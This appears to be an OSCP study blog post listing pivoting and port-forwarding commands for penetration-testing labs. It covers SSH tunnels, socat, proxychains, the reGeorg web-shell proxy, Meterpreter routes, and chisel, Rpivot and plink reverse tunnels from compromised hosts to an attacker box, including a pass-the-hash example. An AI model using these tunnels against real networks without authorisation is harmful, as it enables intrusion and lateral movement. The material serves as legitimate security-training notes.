Pivoting & Port forwarding methods – part2

pivot
OSCP Study materialAll BlogLinux privilege escalation

This blog will focus on port forwarding concepts. Here are some methods we will follow in this blog : –

  • socat
  • windows Netsh
  • SSH
  • proxychains
  • Web Socks
  • Metasploit
  • sshuttle
  • chisel
  • Rpivot
  • Plink
  • Ngrok

SOCAT

To install socat, we simply run:

sudo apt-get updatesudo apt-get install socat

To run socat and forward traffic from your internet node IP 112.72.6.1 port 808 to remote node 62.41.90.2 port 443 run the following command:

socat TCP4-LISTEN:808,fork TCP4:62.41.90.2:443

To forward traffic from your internet node from port 9090 to remote node 62.41.90.2 port 22 and forward traffic from port 81 to port 21 on ftp.microsft.com run the following command:

socat TCP4-LISTEN:9090,fork TCP4:62.41.90.2:22|socat TCP4-LISTEN:81,fork T CP4:ftp.microsft.com:21 

Windows Netsh Port Forwarding

netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport

netsh interface portproxy add v4tov4 listenport=3340 listenaddress=10.1.1.110 connectport=3389 connectaddress=10.1.1.110
  1. listenaddress – is a local IP address waiting for a connection.
  2. listenport – local listening TCP port (the connection waits on it).
  3. connectaddress – is a local or remote IP address (or DNS name) to which the incoming connection will be redirected.
  4. connectport – is a TCP port to which the connection from listenport is forwarded to.

SSH

SOCKS Proxy

ssh -D8080 [user]@[host]

ssh -N -f -D 9000 [user]@[host]
-f : ssh in background
-N : do not execute a remote command

Cool Tip: Konami SSH Port forwarding

[ENTER] + [~C]
-D 1090

Local Port Forwarding

ssh -L [bindaddr]:[port]:[dsthost]:[dstport] [user]@[host]

Remote Port Forwarding

ssh -R [bindaddr]:[port]:[localhost]:[localport] [user]@[host]
ssh -R 3389:10.1.1.224:3389 root@10.11.0.32

proxychains

Config file: /etc/proxychains.conf

[ProxyList]
socks4 localhost 8080

Set the SOCKS4 proxy then proxychains nmap -sT 192.168.5.6

Web SOCKS – reGeorg

reGeorg, the successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.

Drop one of the following files on the server:

  • tunnel.ashx
  • tunnel.aspx
  • tunnel.js
  • tunnel.jsp
  • tunnel.nosocket.php
  • tunnel.php
  • tunnel.tomcat.5.jsp
python reGeorgSocksProxy.py -p 8080 -u http://compromised.host/shell.jsp # the socks proxy will be on port 8080

optional arguments:
  -h, --help           show this help message and exit
  -l , --listen-on     The default listening address
  -p , --listen-port   The default listening port
  -r , --read-buff     Local read buffer, max data to be sent per POST
  -u , --url           The url containing the tunnel script
  -v , --verbose       Verbose output[INFO|DEBUG]

Metasploit

# Meterpreter list active port forwards
portfwd list 

# Forwards 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shell
portfwd add –l 3389 –p 3389 –r target-host 
portfwd add -l 88 -p 88 -r 127.0.0.1
portfwd add -L 0.0.0.0 -l 445 -r 192.168.57.102 -p 445

# Forwards 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shell
portfwd delete –l 3389 –p 3389 –r target-host 
# Meterpreter delete all port forwards
portfwd flush 

or

# Use Meterpreters autoroute script to add the route for specified subnet 192.168.15.0
run autoroute -s 192.168.15.0/24 
use auxiliary/server/socks4a

# Meterpreter list all active routes
run autoroute -p 

route #Meterpreter view available networks the compromised host can access
# Meterpreter add route for 192.168.14.0/24 via Session number.
route add 192.168.14.0 255.255.255.0 3 
# Meterpreter delete route for 192.168.14.0/24 via Session number.
route delete 192.168.14.0 255.255.255.0 3 
# Meterpreter delete all routes
route flush 

sshuttle

The transparent proxy server that works as a poor man’s VPN. Forwards over ssh.

  • Doesn’t require admin.
  • Works with Linux and macOS.
  • Supports DNS tunnelling.
pacman -Sy sshuttle
apt-get install sshuttle
sshuttle -vvr sean@10.11.1.251 10.1.1.0/24
sshuttle -vvr username@pivot_host 10.2.2.0/24 

chisel

go get -v github.com/jpillora/chisel

# forward port 389 and 88 to hacker computer
user@victim$ .\chisel.exe client YOUR_IP:8008 R:88:127.0.0.1:88 R:389:localhost:389 
user@hacker$ /opt/chisel/chisel server -p 8008 --reverse

Rpivot

Server (Attacker box)

python server.py --proxy-port 1080 --server-port 9443 --server-ip 0.0.0.0

Client (Compromised box)

python client.py --server-ip <ip> --server-port 9443

Through corporate proxy

python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \
--ntlm-proxy-port 8080 --domain CORP --username jdoe --password 1q2w3e

Passing the hash

python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \
--ntlm-proxy-port 8080 --domain CORP --username jdoe \
--hashes 986D46921DDE3E58E03656362614DEFE:50C189A98FF73B39AAD3B435B51404EE

plink

# exposes the SMB port of the machine in the port 445 of the SSH Server
plink -l root -pw toor -R 445:127.0.0.1:445 
# exposes the RDP port of the machine in the port 3390 of the SSH Server
plink -l root -pw toor ssh-server-ip -R 3390:127.0.0.1:3389  

plink -l root -pw mypassword 192.168.18.84 -R
plink.exe -v -pw mypassword user@10.10.10.10 -L 6666:127.0.0.1:445

plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your local machine] [VPS IP]
# redirects the Windows port 445 to Kali on port 22
plink -P 22 -l root -pw some_password -C -R 445:127.0.0.1:445 192.168.12.185   

ngrok

# get the binary
wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip
unzip ngrok-stable-linux-amd64.zip 

# log into the service
./ngrok authtoken 3U[REDACTED_TOKEN]Hm

# deploy a port forwarding for 4433
./ngrok http 4433
./ngrok tcp 4433

| Sensitive Content|

For my time in the labs, I started out using single-hop local SSH forwards through a pivot point that I had owned in the remote network. This works just fine if you know that port 80 is open and all you want to do is connect to port 80 inside a network you don’t have direct access to. That looks something like:

ssh root@10.81.1.250 -L 81:10.71.1.28:80

Later on, I learned to do more dynamic SSH forwards with proxychains:

PROXYCHAINS

I used a dynamic ssh tunnel via John:
ssh -f -N -D 127.0.0.1:9050 j0hn@10.11.1.252 -p 22000
Tested with :
proxychains nmap 10.2.2.15 -sT -Pn

ssh -f -N -D 127.0.0.1:9050 sean@10.11.1.251
leafpad /etc/proxychains.conf
proxychains ssh -f -N -D 127.0.0.1:9055 root@10.1.1.1 -p 222
leafpad /etc/proxychains.conf
proxychains ssh luigi@10.3.3.88

And even later, I did double pivoting using proxychains:

ssh -tt -L8080:localhost:8157 sean@10.11.1.251 ssh -t -D 8157 mario@10.1.1.1 -p 222
set up proxychains to use our forwarded port 8080:
leafpad /etc/proxychains.conf
strict_chain or dynamic_chain
socks4 127.0.0.1 8080

Basic Pivoting Types

TypeUse Case
Listen – ListenExposed asset, may not want to connect out.
Listen – ConnectNormal redirect.
Connect – ConnectCan’t bind, so connect to bridge two hosts

Listen – Listen

TypeUse Case
ncatncat -v -l -p 8080 -c "ncat -v -l -p 9090"
socatsocat -v tcp-listen:8080 tcp-listen:9090
remote host 1ncat localhost 8080 < file
remote host 2ncat localhost 9090 > newfile

Listen – Connect

TypeUse Case
ncatncat -l -v -p 8080 -c "ncat localhost 9090"
socatsocat -v tcp-listen:8080,reuseaddr tcp-connect:localhost:9090
remote host 1ncat localhost -p 8080 < file
remote host 2ncat -l -p 9090 > newfile

Connect – Connect

TypeUse Case
ncatncat localhost 8080 -c "ncat localhost 9090"
socatsocat -v tcp-connect:localhost:8080,reuseaddr tcp-connect:localhost:9090
remote host 1ncat -l -p 8080 < file
remote host 2ncat -l -p 9090 > newfile

References

One thought on “Pivoting & Port forwarding methods – part2

Leave a Reply

Your email address will not be published. Required fields are marked *